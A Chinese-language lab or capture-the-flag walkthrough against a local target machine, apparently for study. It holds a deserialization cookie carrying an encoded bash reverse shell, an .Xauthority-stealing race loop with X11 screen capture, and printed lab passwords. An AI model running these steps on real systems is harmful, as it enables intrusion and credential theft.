arp-scan -l
nmap -sS -v 192.168.222.202
gobuster dir -u http://192.168.222.202 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -b 301,401,403,404
訪問/preferences.php
看一下cookie
解密
TzoxNToiVXNlclByZWZlcmVuY2VzIjoyOntzOjg6Imxhbmd1YWdlIjtzOjI6ImZyIjtzOjE1OiJiYWNrZ3JvdW5kQ29sb3IiO3M6NDoiI2RkZCI7fQ==
O:15:"UserPreferences":2:{s:8:"language";s:2:"fr";s:15:"backgroundColor";s:4:"#ddd";}
language 的值可以直接執行系統指令
反彈shell
nc -lnvp 1234
curl http://192.168.222.202/preferences.php --cookie "preferences=TzoxNToiVXNlclByZWZlcmVuY2VzIjoyOntzOjg6Imxhbmd1YWdlIjtzOjU4OiJiYXNoIC1jICdleGVjIGJhc2ggLWkgJj4vZGV2L3RjcC8xOTIuMTY4LjIyMi4xNDkvMTIzNCA8JjEnIjtzOjE1OiJiYWNrZ3JvdW5kQ29sb3IiO3M6NDoiI2RkZCI7fQ%3D%3D"
信息收集
上傳pspy64收集下信息,發現backup一直在運行,可能是存在定時任務,那么backup就是我們要利用的文件了
查看 backup 文件
這是一個用于備份文件的bash腳本,主要功能是將 ?/home/vanity?目錄下的文件(除user.txt外)復制到 ?/backup?目錄,并進行完整性校驗。
dd 命令是一個低級別的復制命令,一般在復制整個硬盤的時候用。比如做啟動盤的時候,都是直接dd .然后有一個比較關鍵的點,dd 命令執行的時候會修改文件的權限,所以腳本在?dd ?后用?chmod 700 ?來修改文件權限。
可以使用條件競爭在它修改文件權限前讀到文件
上傳pspy64收集下信息,發現backup一直在運行,可能是存在定時任務,那么backup就是我們要利用的文件了
while true; do cat .Xauthority >> /tmp/log 2>/dev/null;sleep 0.01; done
.Xauthority ?這個文件是二進制的,所以用 cat 讀取的時候會亂碼。拿出來也沒用。所以用 XXD 來讀取。而靶機顯然不會有 XXD,所以我們簡單弄一個 busybox 過去就好了。
這個命令是一個 無限循環,它會持續執行以下操作:
while true; do
cat .Xauthority >> /tmp/log 2>/dev/null
sleep 0.01
done
作用分析
- while true; do ... done
- cat .Xauthority >> /tmp/log
- 2>/dev/null
- sleep 0.01
潛在用途(可能惡意)
- 竊取 X11 認證信息
- .Xauthority 存儲了 X11 會話的認證密鑰,攻擊者可能利用它進行GUI 會話劫持(如遠程控制桌面)。
- 隱蔽數據泄露
- 由于 /tmp/log 會不斷增長,攻擊者可能利用它隱蔽地收集 .Xauthority 數據(如通過 scp 或 nc 傳輸到遠程服務器)。
- 磁盤填充攻擊
- 如果 .Xauthority 較大,循環寫入 /tmp/log 可能導致 /tmp 分區被填滿,影響系統運行。
檢測方法
cat /tmp/log
利用 .Xauthority
6000 - Pentesting X11 - HackTricks
w 查看本地會話,目標vanity
上傳busybox
chmod +x busybox.1
./busybox.1 xxd log
./busybox xxd log 是一個 二進制文件查看/編輯命令,主要用于以 十六進制(HEX)和 ASCII 格式 查看或修改文件容。
xauth -f log
xauth -f log 是一個與 X Window 系統認證相關的命令,主要用于操作 X11 授權文件(.Xauthority 文件)。
- xauth:X11 認證管理工具,用于查看或修改 X 服務器的訪問權限。
- -f log:指定要操作的授權文件(默認是 ~/.Xauthority,這里改為 log)。
常見用法
bash復制代碼xauth -f log list # 查看 log 文件中的 X11 認證記錄 xauth -f log merge # 將 log 文件合并到當前會話的 .Xauthority xauth -f log extract - # 導出 log 文件中的認證信息
每行表示一個 X11 顯示(display)的認證記錄,包含:
- 顯示名稱(如 unix:0 或 :0)
- 認證協議(如 MIT-MAGIC-COOKIE-1)
- 認證密鑰(十六進制字符串)
export XAUTHORITY=/tmp/log
export XAUTHORITY=/tmp/log 這條命令的作用是 臨時修改當前 Shell 會話的 X11 認證文件路徑,將默認的
~/.Xauthority(存儲 X Window 系統的認證 cookie)替換為自定義路徑
/tmp/log。
xwd -root -screen -silent -display :0 > screenshot.xwd
這條命令 xwd -root -screen -silent -display :0 > screenshot.xwd 用于 捕獲 Linux/Unix 系統上的 X11 圖形界面屏幕截圖,并將其保存為 .xwd(X Window Dump)格式的文件。
文件格式(.xwd)
- XWD 格式 是 X11 系統的原生截圖格式,包含像素數據和窗口元信息。
- 轉換方法:可用 convert(ImageMagick)轉換為常見格式(如 PNG/JPG):
convert screenshot.xwd screenshot.png
將screenshot.xwd下載到本地
vanity:xd0oITR93KIQDbiD
切換用戶
su -l vanity
提權
sudo -l
cat /usr/local/bin/php-server.sh
1. 腳本解析
- #!/bin/bash:指定使用 Bash 解釋器執行腳本。
- /usr/bin/php:調用 PHP 解釋器(通常位于 /usr/bin/php)。
- -t /opt:設置服務器的 文檔根目錄(Document Root) 為 /opt(即網站文件存放位置)。
- -S 0.0.0.0:8000:啟動 PHP 內置服務器,監聽所有網絡接口(0.0.0.0)的 8000 端口。
2. 作用
快速啟動 PHP 開發服務器
- 適用于 本地開發測試,無需配置 Nginx/Apache。
- 訪問方式:http://:8000(如 http://localhost:8000)。
sudo /usr/local/bin/php-server.sh
運行該腳本,訪問靶機8000端口
點擊F12
root密碼是LightningBolt123
詳解與實戰示例)
